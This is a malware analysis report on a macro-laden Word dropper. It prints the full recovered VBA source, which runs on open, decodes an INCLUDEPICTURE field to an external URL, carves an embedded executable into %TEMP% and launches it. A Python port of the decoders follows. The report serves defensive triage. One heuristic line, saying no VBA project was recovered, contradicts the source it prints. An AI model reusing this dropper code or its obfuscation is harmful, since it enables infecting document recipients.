Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a8552eb60a95d95a…

MALICIOUS

Office (OLE)

Size: 236.5 KB
Created: 2015-03-15 08:12:00
Authoring application: Microsoft Office Word
First seen: 2015-09-18
MD5: 2e7ac168800b5b1e82cfd4b582015c00
SHA-1: d3c65e8270374dec11d6fd4847192db871942141
SHA-256: a8552eb60a95d95a281964913aee09522df57c730ab7fd84ea2ff12472681bba
Risk score: 216

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1140 Deobfuscate/Decode Files or Information

The sample is a Word document carrying VBA macros, flagged by OLE_VBA_MACROS and OLE_VBA_PCODE_AUTOEXEC_EXEC. All three auto-exec entry points in the recovered source (AutoOpen, Auto_Open, Workbook_Open) funnel into one routine, triangleGebcKFhE; in Word only AutoOpen actually fires, since Auto_Open and Workbook_Open are Excel entry points. That routine deletes the document's inline shapes, inserts a Word field whose code is XOR-decoded at run time from a 162-character hex blob with the key "triangleKuDMEqAdaj" (decoding it yields an INCLUDEPICTURE field pointing at an external http:// URL, a document-open callback that the plain-text EMBEDDED_URL scan could not see), then walks ActiveDocument.Paragraphs for the marker string "iRETYJkkQEtriangle", hex-decodes the paragraph text that follows into a 77,824-byte buffer, writes that buffer to %TEMP%\trianglefHXmNBva.exe with Put #, and launches it through the Open method of Shell.Application. The COM class name is assembled as "Sh" & "e" & Chr(108) & Chr(108) & ".Application" to defeat string matching, which is the CreateObject call that OLE_VBA_CREATEOBJ matched; the many "If <never-assigned string> = "..." Then xaUiKKRstriangle(...)" blocks are dead-code padding, since an unassigned String is always empty.

The macro itself performs no network download: the executable is carried in the document body as hex text, so behaviourally this is a dropper with an embedded second stage, and the T1140 mapping reflects the hex and XOR decoding it does at run time. The ClamAV name Doc.Downloader.Generic-6698421-0 is a generic signature family name, not a description of this sample's behaviour. 'macros.bas' is not a file embedded by the attacker; it is the VBA source recovered from the OLE VBA project by olevba during analysis (see Extracted artifacts).

Heuristics 11

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
             Set triangleqXMkTaJfCI = CreateObject(trianglepcJGHnXE)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
             Auto_Open
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
             TCnfKXBgswutriangle = Environ("TEMP")
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    • URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
    • URL http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9721 bytes
SHA-256: 9d35d0d50ebabfe54d4dbf164ba1437b602586e611e9bdab61bd4f1de919088c
Detection: ClamAV: No threats found
Obfuscation or payload: likely. The carved artifact contains one long base64-like blob; in this source it is the 162-character hex string passed to the XOR decoder JAhgLLtAOftriangle, which the heuristic classifies as base64-like.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub CommandButton1_Click()

End Sub

Attribute VB_Name = "Module1"

Attribute VB_Name = "NewMacros"
         
Public Function JAhgLLtAOftriangle(trianglePUaBMjgad As String, bGTLLgAJhtriangle As String) As String
            Dim triangleAfVnhigD As Long
            Dim triangleyYxkiElmUDn As String
            Dim ZmEzVLDElItriangle As Integer
            Dim QIGuHCSGadtriangle As Integer
            

            For triangleAfVnhigD = 1 To (Len(bGTLLgAJhtriangle) / 2)
                ZmEzVLDElItriangle = Val("&H" & (Mid$(bGTLLgAJhtriangle, (2 * triangleAfVnhigD) - 1, 2)))
                QIGuHCSGadtriangle = Asc(Mid$(trianglePUaBMjgad, ((triangleAfVnhigD Mod Len(trianglePUaBMjgad)) + 1), 1))
                triangleyYxkiElmUDn = triangleyYxkiElmUDn + Chr(ZmEzVLDElItriangle Xor QIGuHCSGadtriangle)
            Next triangleAfVnhigD
           JAhgLLtAOftriangle = triangleyYxkiElmUDn
End Function
Sub trianglemwBWGMMlTp()
On Error Resume Next
         Dim triangleqEtWAMru As Integer
         Dim pSezbzuLHtriangle As String
         Dim uWMBAugftriangle As String
         Dim UKnBHtcSVtriangle As String
         Dim nUNpxVjivUtriangle As String
         nUNpxVjivUtriangle = "exe"
         pSezbzuLHtriangle = "."
         uWMBAugftriangle = "trianglefHXmNBva"
         UKnBHtcSVtriangle = uWMBAugftriangle + pSezbzuLHtriangle + nUNpxVjivUtriangle
         triangleqEtWAMru = FreeFile()
             Dim triangletlHMXkDr As String

             If triangletlHMXkDr = "triangleNtAYnBvSBk" Then
               xaUiKKRstriangle ("WEIBgycWNtriangle: 20:51:57")
             End If
         Open UKnBHtcSVtriangle For Binary Access Read Write As triangleqEtWAMru Len = 15012
             Dim BbvDXalzhKtriangle As String

             If BbvDXalzhKtriangle = "OZkGWUHyWdctriangle" Then
               xaUiKKRstriangle ("xoUlHujVVEtriangle: 11:23:29")
             End If
End Sub

Sub Workbook_Open()
On Error Resume Next
         Auto_Open
End Sub

Sub triangleFjdhqDbCiU(triangleeUcxbByCgA As String)
On Error Resume Next
         Dim trianglepcJGHnXE
         Dim triangleqXMkTaJfCI As Object
         Dim triangleHEhUQLKQIHG
         Dim TCnfKXBgswutriangle As String
             Dim kjGSDPNzutriangle As String

             If kjGSDPNzutriangle = "triangleEmmQkjfGuom" Then
               xaUiKKRstriangle ("triangleiAhOxcwWYA: 21:12:10")
             End If
         TCnfKXBgswutriangle = Environ("TEMP")
             Dim CoFdvuBxRtriangle As String

             If CoFdvuBxRtriangle = "fgMsYOtqlVEtriangle" Then
               xaUiKKRstriangle ("rvpWICMTLtriangle: 23:10:20")
             End If
         ChDrive (TCnfKXBgswutriangle)
             Dim cXUutkqcMctriangle As String

             If cXUutkqcMctriangle = "triangleZkTkKrnI" Then
               xaUiKKRstriangle ("UvDahWYWpoitriangle: 19:11:31")
             End If
         ChDir (TCnfKXBgswutriangle)

             Dim iaZGUukUChTtriangle As String

             If iaZGUukUChTtriangle = "lxMnTKrctriangle" Then
               xaUiKKRstriangle ("iHIbGTURDtriangle: 14:43:40")
             End If
         triangleHEhUQLKQIHG = "Sh" & "e" & Chr(108)
             Dim triangleAmatLxBsgC As String

             If triangleAmatLxBsgC = "bKLHuEhHFtriangle" Then
               xaUiKKRstriangle ("trianglexQDIVPgHcZr: 14:13:12")
             End If
         trianglepcJGHnXE = triangleHEhUQLKQIHG & Chr(108) & ".Application"
         Set triangleqXMkTaJfCI = CreateObject(trianglepcJGHnXE)
             Dim FJkcANKvDQtriangle As String

             If FJkcANKvDQtriangle = "kLOLeSNPtriangle" Then
               xaUiKKRstriangle ("triangleQuaSwKDd: 14:34:22")
             End If
         triangleqXMkTaJfCI.Open (TCnfKXBgswutriangle & "\" & triangleeUcxbByCgA)

             Dim triangleafuDWxjMS As String

             If triangleafuDWxjMS = "OXaDZscmtriangle" Then
               xaUiKKRstriangle ("triangleoTirYqBK: 10:22:53")
             End If
         CYQjYIunmtriangle
End Sub

Sub AutoOpen()
On Error Resume Next
         Auto_Open
End Sub

Sub triangleGebcKFhE()
On Error Resume Next
         Dim triangleHaMiMeDjJy As Byte
         Dim TCnfKXBgswutriangle As String
         Dim BFbrfeYWMtriangle As Long
         Dim triangleVeYYXTMwN As Paragraph
         Dim LCMngxKhertriangle As String
         Dim triangleqEtWAMru As Integer
         Dim UKnBHtcSVtriangle As String
         Dim ESirQRmCEKxtriangle As String
         Dim triangleeCIuJtMt As InlineShape
         Dim triangleSaItgaQAd As Integer
         Dim triangleULNyUwXjeuv As Boolean
         Dim uWMBAugftriangle As String
         Dim nUNpxVjivUtriangle As String
         pSezbzuLHtriangle = "."
         nUNpxVjivUtriangle = "exe"
         uWMBAugftriangle = "trianglefHXmNBva"
         LCMngxKhertriangle = "iRETYJkkQEtriangle"
             Dim triangleWTXgZKkBsFl As String

             If triangleWTXgZKkBsFl = "KtUhjQedtriangle" Then
               xaUiKKRstriangle ("FGmglRarlatriangle: 12:12:33")
             End If
        For Each triangleeCIuJtMt In ActiveDocument.InlineShapes
        triangleeCIuJtMt.Delete
        Next triangleeCIuJtMt
        
         Selection.HomeKey Unit:=wdStory
         Selection.Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _
         JAhgLLtAOftriangle("triangleKuDMEqAdaj", "3b2722223228201b3c07191023044441481c061d115448430c251b2b3b2405280b0f02011047050b481b1566162b2331142f104e0319130e0440170415741c207074417354564c10131d0053454c392f55"), PreserveFormatting:=True

         UKnBHtcSVtriangle = uWMBAugftriangle + pSezbzuLHtriangle + nUNpxVjivUtriangle
             Dim triangleRaQDswkEC As String

             If triangleRaQDswkEC = "triangleGzDuKFSfk" Then
               xaUiKKRstriangle ("COHDWVoqPtriangle: 11:10:23")
             End If
         TCnfKXBgswutriangle = Environ("TEMP")
             Dim ydZVzBJhftriangle As String

             If ydZVzBJhftriangle = "triangledQxkRLIokM" Then
               xaUiKKRstriangle ("tWTOxzoaUYtriangle: 11:22:49")
             End If
         ChDrive (TCnfKXBgswutriangle)
             Dim UvxnsrbPQqPtriangle As String

             If UvxnsrbPQqPtriangle = "triangleFXkuNFoicBB" Then
               xaUiKKRstriangle ("wysmVCeHlstriangle: 17:26:20")
             End If
         ChDir (TCnfKXBgswutriangle)
         triangleqEtWAMru = FreeFile()

         trianglemwBWGMMlTp

             Dim WiCuAPpdUXotriangle As String

             If WiCuAPpdUXotriangle = "bkzFBKyIGGtriangle" Then
               xaUiKKRstriangle ("trianglemRMxmAcA: 10:16:10")
             End If
         For Each triangleVeYYXTMwN In ActiveDocument.Paragraphs
                 trianglemDoNZojiE (triangleVeYYXTMwN)
                 ESirQRmCEKxtriangle = triangleVeYYXTMwN.Range.Text
             Dim VoyhdLZQjtriangle As String

             If VoyhdLZQjtriangle = "triangleRtjyEkFFBQ" Then
               xaUiKKRstriangle ("mLZsNkSttriangle: 21:24:43")
             End If
                 If (triangleULNyUwXjeuv = True) Then

                         BFbrfeYWMtriangle = 1
                 Dim TDeFppzEHatriangle As Integer
                 TDeFppzEHatriangle = 2
                 Dim trianglevOPEzAvRRxa As String
                 Dim triangleSLnXVEcmt As Long
                 Dim LQbCPPxktriangle As Long
                 Dim PcMlUEIUcktriangle As Long
                 LQbCPPxktriangle = 0
                 triangleSLnXVEcmt = Len(ESirQRmCEKxtriangle)
                 PcMlUEIUcktriangle = 77824
                 ReDim triangleyKIdMVwUqh(0 To PcMlUEIUcktriangle - 1) As Byte

                         While (BFbrfeYWMtriangle < triangleSLnXVEcmt)
                                 trianglevOPEzAvRRxa = Mid(ESirQRmCEKxtriangle, BFbrfeYWMtriangle, 1)
                                         If trianglevOPEzAvRRxa = " " Then
                                                 BFbrfeYWMtriangle = BFbrfeYWMtriangle + 1
                                         End If
                                 triangleyKIdMVwUqh(LQbCPPxktriangle) = CByte("&H" & Mid(ESirQRmCEKxtriangle, BFbrfeYWMtriangle, TDeFppzEHatriangle))
                                 BFbrfeYWMtriangle = BFbrfeYWMtriangle + TDeFppzEHatriangle
                                         LQbCPPxktriangle = LQbCPPxktriangle + 1
                         Wend
                 ElseIf (InStr(1, ESirQRmCEKxtriangle, LCMngxKhertriangle) > 0 And Len(ESirQRmCEKxtriangle) > 0) Then
                         Dim oEjCNshPElTtriangle As Boolean
                         oEjCNshPElTtriangle = True
                         triangleULNyUwXjeuv = oEjCNshPElTtriangle
                 End If
                 Next
         xaUiKKRstriangle ("22:10:42")
                 Put #triangleqEtWAMru, 1, triangleyKIdMVwUqh
         Close #triangleqEtWAMru
         triangleFjdhqDbCiU (UKnBHtcSVtriangle)
End Sub

Sub xaUiKKRstriangle(OfirIHRYtriangle As String)
On Error Resume Next
         If OfirIHRYtriangle = "2" Then
         MsgBox (OfirIHRYtriangle)
         End If
End Sub

Sub trianglemDoNZojiE(edMyOubrtriangle)
On Error Resume Next
         DoEvents
End Sub

Sub Auto_Open()
On Error Resume Next
         triangleGebcKFhE
End Sub

Sub CYQjYIunmtriangle()
On Error Resume Next
End Sub
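The two decoding routines in the macro above, JAhgLLtAOftriangle (the XOR field decoder) and the hex-carving loop in triangleGebcKFhE, ported to Python as an added example that is not part of this report or of the malware's own code. It assumes only the key, hex blob, marker string and buffer size visible in the recovered source; the function names are descriptive stand-ins for the obfuscated identifiers, and the document paragraphs it runs on are a constructed stand-in for ActiveDocument.Paragraphs. Running it recovers the field code inserted at document open and shows how an analyst would carve the embedded executable from the document text instead of detonating the sample.

```python
"""Added example (not the report's or the malware's code): Python port of the
two decoding routines in the recovered macro, so the inserted field code and
the dropped executable can be recovered statically.

Key, hex blob, marker and buffer size are copied from the macro source;
the sample paragraphs are constructed."""
import re

# Copied from Sub triangleGebcKFhE: the arguments to JAhgLLtAOftriangle(...)
FIELD_KEY = "triangleKuDMEqAdaj"
FIELD_HEX = (
    "3b2722223228201b3c07191023044441481c061d115448430c251b2b3b2405280b0f"
    "02011047050b481b1566162b2331142f104e0319130e0440170415741c2070744173"
    "54564c10131d0053454c392f55"
)
# Copied from the same routine: marker paragraph and ReDim size (0 To 77824-1)
PAYLOAD_MARKER = "iRETYJkkQEtriangle"
PAYLOAD_SIZE = 77824
DROP_NAME = "trianglefHXmNBva.exe"  # uWMBAugftriangle + "." + "exe", written under %TEMP%


def xor_decode_field(key: str, blob: str) -> str:
    """Port of JAhgLLtAOftriangle: each hex pair XORed with a repeating key.

    The VBA loop runs i = 1 .. Len(blob)/2 and takes the key byte from
    Mid$(key, (i Mod Len(key)) + 1, 1), so the key stream starts at key[1]
    and wraps to key[0] at i = 18; a naive port starting at key[0] is wrong.
    """
    out = []
    for i in range(1, len(blob) // 2 + 1):
        byte = int(blob[2 * i - 2 : 2 * i], 16)
        out.append(chr(byte ^ ord(key[i % len(key)])))
    return "".join(out)


def carve_hex_payload(paragraphs, marker=PAYLOAD_MARKER, size=PAYLOAD_SIZE) -> bytes:
    """Port of the carve loop in Sub triangleGebcKFhE.

    Every paragraph after the one containing the marker is treated as a hex
    dump and decoded into a zero-filled buffer of fixed size. Faithful to the
    original: the buffer is re-allocated (ReDim without Preserve) for each such
    paragraph, so the last one wins, and a pair that is not valid hex is
    skipped the way On Error Resume Next skips the failed CByte(), leaving a
    zero byte. The macro then writes the whole buffer with Put #, so the
    dropped file is always exactly `size` bytes, zero-padded.
    """
    armed = False
    buf = bytearray()
    for text in paragraphs:
        if armed:
            digits = re.sub(r"\s+", "", text)  # VBA skips separators one space at a time
            buf = bytearray(size)
            idx = 0
            for pos in range(0, len(digits) - 1, 2):
                if idx >= size:
                    break
                try:
                    buf[idx] = int(digits[pos : pos + 2], 16)
                except ValueError:
                    pass
                idx += 1
        elif text and marker in text:
            armed = True
    return bytes(buf)


def looks_like_pe(data: bytes) -> bool:
    """Cheap check that a carved buffer is a Windows executable: MZ magic plus
    a PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew : e_lfanew + 4] == b"PE\0\0"


# Constructed stand-in for ActiveDocument.Paragraphs (not the real sample's
# text): a decoy paragraph, the marker, then a space-separated hex dump of a
# minimal DOS header whose e_lfanew points at a PE signature.
_stub = bytearray(0x44)
_stub[0:2] = b"MZ"
_stub[0x3C:0x40] = (0x40).to_bytes(4, "little")
_stub[0x40:0x44] = b"PE\0\0"
SAMPLE_PARAGRAPHS = [
    "Please find your invoice attached.\r",
    PAYLOAD_MARKER + "\r",
    " ".join(f"{b:02x}" for b in _stub) + "\r",  # Range.Text ends in a carriage return
]


def triage(paragraphs=SAMPLE_PARAGRAPHS):
    """Recover both artefacts and summarise them the way an analyst note would."""
    field = xor_decode_field(FIELD_KEY, FIELD_HEX)
    payload = carve_hex_payload(paragraphs)
    return {
        # decodes to: INCLUDEPICTURE  "http://innovationhub.de/wp-content/image.php?id=10207&data=" \d
        "field_code": field,
        "field_is_includepicture": field.lstrip().startswith("INCLUDEPICTURE"),
        "payload_size": len(payload),
        "payload_is_pe": looks_like_pe(payload),
        "drop_path": "%TEMP%\\" + DROP_NAME,
    }


if __name__ == "__main__":
    for k, v in triage().items():
        print(f"{k}: {v}")
```

Running the same carve over the real document's paragraph text (the text recovered from the WordDocument stream) yields the 77,824-byte file the macro drops, and its hash is the indicator to pivot on. The decoded field code is an INCLUDEPICTURE field with an external http URL, which Word resolves when the field updates, so that host is a second indicator alongside the dropped file even though the macro never issues a download itself.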